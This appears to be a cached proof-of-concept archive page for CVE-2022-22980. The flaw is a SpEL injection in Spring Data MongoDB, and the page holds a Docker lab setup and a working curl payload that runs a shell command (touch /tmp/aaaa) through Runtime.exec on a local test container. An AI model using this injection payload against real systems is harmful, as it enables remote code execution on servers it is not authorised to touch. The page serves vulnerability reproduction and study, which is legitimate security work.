Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2022-22980 PoC — Spring Data MongoDB 安全漏洞

Source
https://github.com/kuron3k0/Spring-Data-Mongodb-Example
Associated Vulnerability
Title:Spring Data MongoDB 安全漏洞 (CVE-2022-22980)
Description:Spring Framework是美国Spring团队的一套开源的Java、JavaEE应用程序框架。该框架可帮助开发人员构建高质量的应用。 Spring Data MongoDB存在安全漏洞,该漏洞源于在使用带有 SpEL 表达式的 @Query 或 @Aggregation-annotated 查询方法时容易受到 SpEL 注入的影响。
Description
CVE-2022-22980环境
Readme
# Spring-Data-Mongodb-Example

CVE-2022-22980环境

## Build docker environment
```bash
docker build  -t mongo .
docker run -dit -p 6666:6666 mongo
```

## Poc
```bash
➜  Spring-Data-Mongodb-Example git:(main) curl 0:6666/v1/user/get -d 'id=T(java.lang.Runtime).getRuntime().exec("touch /tmp/aaaa")'
{"timestamp":"2022-07-14T01:54:10.828+00:00","status":500,"error":"Internal Server Error","path":"/v1/user/get"}
➜  Spring-Data-Mongodb-Example git:(main) docker exec -it 3a ls -la /tmp
total 4
drwxrwxrwt    5 root     root           123 Jul 14 01:54 .
drwxr-xr-x   19 root     root          4096 Jul 14 01:53 ..
-rw-r--r--    1 root     root             0 Jul 14 01:54 aaaa
```
File Snapshot

 [4.0K]  /data/pocs/305546a4d0d53b7472862c56b04f9406d517936f
├── [ 364]  Dockerfile
├── [ 876]  mongodb.ql
├── [8.9K]  mvnw
├── [5.7K]  mvnw.cmd
├── [1.7K]  pom.xml
├── [ 684]  README.md
├── [2.6K]  springdatamongodb_spel.ql
└── [4.0K]  src
    └── [4.0K]  main
        ├── [4.0K]  java
        │   └── [4.0K]  com
        │       └── [4.0K]  example
        │           └── [4.0K]  mongodb
        │               ├── [4.0K]  controller
        │               │   └── [1.2K]  UserController.java
        │               ├── [4.0K]  model
        │               │   └── [ 852]  User.java
        │               ├── [ 323]  MongoExampleApplication.java
        │               └── [4.0K]  repository
        │                   └── [ 370]  UserRepository.java
        └── [4.0K]  resources
            └── [ 124]  application.properties

10 directories, 12 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.